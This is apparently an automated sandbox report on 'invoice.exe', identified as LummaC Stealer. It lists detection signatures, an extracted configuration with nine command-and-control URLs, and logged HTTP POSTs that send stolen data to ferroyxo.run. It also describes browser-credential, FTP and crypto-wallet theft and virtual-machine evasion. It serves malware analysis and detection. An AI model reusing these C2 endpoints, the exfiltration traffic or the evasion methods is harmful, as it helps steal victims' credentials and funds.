Edit tour

Windows Analysis Report
invoice.exe

Overview

General Information

Sample name:invoice.exe
Analysis ID:1654483
MD5:57bcb61167abd03d9d98705ab39e79ab
SHA1:487af25088915c0506635a7bd44cd65177f91689
SHA256:7c321f8a0d6c357d3406afb96408968d107c81f8282e2353ea4cebed67432f88
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • invoice.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 57BCB61167ABD03D9D98705AB39E79AB)
  • cleanup
{
  "C2 url": [
    "ferroyxo.run/quiwdz",
    "oreheatq.live/gsopp",
    "castmaxw.run/ganzde",
    "weldorae.digital/geds",
    "steelixr.live/aguiz",
    "advennture.top/GKsiio",
    "targett.top/dsANGt",
    "smeltingt.run/giiaus",
    "ferromny.digital/gwpd"
  ],
  "Build id": "e91dba334d13b3862d5fcf1c07f54f82f2e4b89799"
}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1003304693.0000000002760000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.invoice.exe.2760000.1.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          0.2.invoice.exe.27c0000.2.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            0.2.invoice.exe.2760000.1.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-04-02T11:42:45.533112+020020283713Unknown Traffic192.168.2.749681172.67.131.170443TCP
              2025-04-02T11:42:46.849307+020020283713Unknown Traffic192.168.2.749682172.67.131.170443TCP
              2025-04-02T11:42:48.236401+020020283713Unknown Traffic192.168.2.749683172.67.131.170443TCP
              2025-04-02T11:42:49.246361+020020283713Unknown Traffic192.168.2.749684172.67.131.170443TCP
              2025-04-02T11:42:51.223014+020020283713Unknown Traffic192.168.2.749685172.67.131.170443TCP
              2025-04-02T11:42:52.409357+020020283713Unknown Traffic192.168.2.749686172.67.131.170443TCP
              2025-04-02T11:42:54.175757+020020283713Unknown Traffic192.168.2.749687172.67.131.170443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://ferroyxo.run/7gAvira URL Cloud: Label: malware
              Source: https://ferroyxo.run/quiwdzAvira URL Cloud: Label: malware
              Source: https://ferroyxo.run/7Avira URL Cloud: Label: malware
              Source: https://ferroyxo.run/quiwdzr2Avira URL Cloud: Label: malware
              Source: ferroyxo.run/quiwdzAvira URL Cloud: Label: malware
              Source: https://ferroyxo.run/Avira URL Cloud: Label: malware
              Source: https://ferroyxo.run/quiwdzbAvira URL Cloud: Label: malware
              Source: https://ferroyxo.run/quiwdz55Avira URL Cloud: Label: malware
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["ferroyxo.run/quiwdz", "oreheatq.live/gsopp", "castmaxw.run/ganzde", "weldorae.digital/geds", "steelixr.live/aguiz", "advennture.top/GKsiio", "targett.top/dsANGt", "smeltingt.run/giiaus", "ferromny.digital/gwpd"], "Build id": "e91dba334d13b3862d5fcf1c07f54f82f2e4b89799"}
              Source: invoice.exeVirustotal: Detection: 64%Perma Link
              Source: invoice.exeReversingLabs: Detection: 52%
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: ferroyxo.run/quiwdz
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: oreheatq.live/gsopp
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: castmaxw.run/ganzde
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: weldorae.digital/geds
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: steelixr.live/aguiz
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: advennture.top/GKsiio
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: targett.top/dsANGt
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: smeltingt.run/giiaus
              Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmpString decryptor: ferromny.digital/gwpd
              Source: invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49681 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49682 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49683 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49684 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49685 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49686 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49687 version: TLS 1.2
              Source: invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Source: Malware configuration extractorURLs: ferroyxo.run/quiwdz
              Source: Malware configuration extractorURLs: oreheatq.live/gsopp
              Source: Malware configuration extractorURLs: castmaxw.run/ganzde
              Source: Malware configuration extractorURLs: weldorae.digital/geds
              Source: Malware configuration extractorURLs: steelixr.live/aguiz
              Source: Malware configuration extractorURLs: advennture.top/GKsiio
              Source: Malware configuration extractorURLs: targett.top/dsANGt
              Source: Malware configuration extractorURLs: smeltingt.run/giiaus
              Source: Malware configuration extractorURLs: ferromny.digital/gwpd
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 172.67.131.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 172.67.131.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49687 -> 172.67.131.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49684 -> 172.67.131.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49682 -> 172.67.131.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49686 -> 172.67.131.170:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49681 -> 172.67.131.170:443
              Source: global trafficHTTP traffic detected: POST /quiwdz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: ferroyxo.run
              Source: global trafficHTTP traffic detected: POST /quiwdz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=v3zzUIS0f2zrKhOWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14498Host: ferroyxo.run
              Source: global trafficHTTP traffic detected: POST /quiwdz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1f0d8SnvYvUO656QMvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15070Host: ferroyxo.run
              Source: global trafficHTTP traffic detected: POST /quiwdz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=d2pj0dUd2nx8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20365Host: ferroyxo.run
              Source: global trafficHTTP traffic detected: POST /quiwdz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=04CpSY8Q9xhdWEUI49dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2404Host: ferroyxo.run
              Source: global trafficHTTP traffic detected: POST /quiwdz HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=fbxl3f5CQUptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 568670Host: ferroyxo.run
              Source: global trafficHTTP traffic detected: POST /quiwdz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 89Host: ferroyxo.run
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: ferroyxo.run
              Source: global trafficDNS traffic detected: DNS query: c.pki.goog
              Source: unknownHTTP traffic detected: POST /quiwdz HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 51Host: ferroyxo.run
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: invoice.exe, 00000000.00000003.979670115.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ferroyxo.run/
              Source: invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.972990055.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ferroyxo.run/7
              Source: invoice.exe, 00000000.00000003.979948724.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.994824179.0000000000838000.00000004.00000020.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.979670115.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ferroyxo.run/7g
              Source: invoice.exe, 00000000.00000003.979670115.0000000000842000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ferroyxo.run/quiwdz
              Source: invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ferroyxo.run/quiwdz55
              Source: invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ferroyxo.run/quiwdzb
              Source: invoice.exe, 00000000.00000003.972990055.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ferroyxo.run/quiwdzr2
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
              Source: invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
              Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49681 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49682 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49683 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49684 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49685 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49686 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.131.170:443 -> 192.168.2.7:49687 version: TLS 1.2

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: invoice.exe
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E7CF40_3_007E7CF4
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E7CF40_3_007E7CF4
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E52C90_3_007E52C9
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E52C90_3_007E52C9
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_008446990_3_00844699
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_008446990_3_00844699
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_008446990_3_00844699
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_008446990_3_00844699
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E7CF40_3_007E7CF4
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E7CF40_3_007E7CF4
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E52C90_3_007E52C9
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E52C90_3_007E52C9
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E7CF40_3_007E7CF4
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E7CF40_3_007E7CF4
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E52C90_3_007E52C9
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E52C90_3_007E52C9
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E7CF40_3_007E7CF4
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E7CF40_3_007E7CF4
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E52C90_3_007E52C9
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E52C90_3_007E52C9
              Source: invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: invoice.exeStatic PE information: Section: .data ZLIB complexity 1.0000459241009683
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
              Source: invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: invoice.exe, 00000000.00000003.934056465.0000000003251000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.920392947.0000000003297000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000000.00000003.921388098.0000000000855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: invoice.exeVirustotal: Detection: 64%
              Source: invoice.exeReversingLabs: Detection: 52%
              Source: C:\Users\user\Desktop\invoice.exeFile read: C:\Users\user\Desktop\invoice.exeJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\invoice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: invoice.exeStatic PE information: section name: .Dota
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E4C7D push eax; ret 0_3_007E4C9D
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E4C7D push eax; ret 0_3_007E4C9D
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E6656 push eax; retf 007Ch0_3_007E6659
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E6656 push eax; retf 007Ch0_3_007E6659
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC78C push ebx; ret 0_3_007DC791
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC78C push ebx; ret 0_3_007DC791
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC788 push ss; ret 0_3_007DC789
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC788 push ss; ret 0_3_007DC789
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E4C7D push eax; ret 0_3_007E4C9D
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E4C7D push eax; ret 0_3_007E4C9D
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E6656 push eax; retf 007Ch0_3_007E6659
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E6656 push eax; retf 007Ch0_3_007E6659
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC78C push ebx; ret 0_3_007DC791
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC78C push ebx; ret 0_3_007DC791
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC788 push ss; ret 0_3_007DC789
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC788 push ss; ret 0_3_007DC789
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E4C7D push eax; ret 0_3_007E4C9D
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E4C7D push eax; ret 0_3_007E4C9D
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E6656 push eax; retf 007Ch0_3_007E6659
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E6656 push eax; retf 007Ch0_3_007E6659
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC78C push ebx; ret 0_3_007DC791
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC78C push ebx; ret 0_3_007DC791
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC788 push ss; ret 0_3_007DC789
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007DC788 push ss; ret 0_3_007DC789
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E4C7D push eax; ret 0_3_007E4C9D
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E4C7D push eax; ret 0_3_007E4C9D
              Source: C:\Users\user\Desktop\invoice.exeCode function: 0_3_007E6656 push eax; retf 007Ch0_3_007E6659
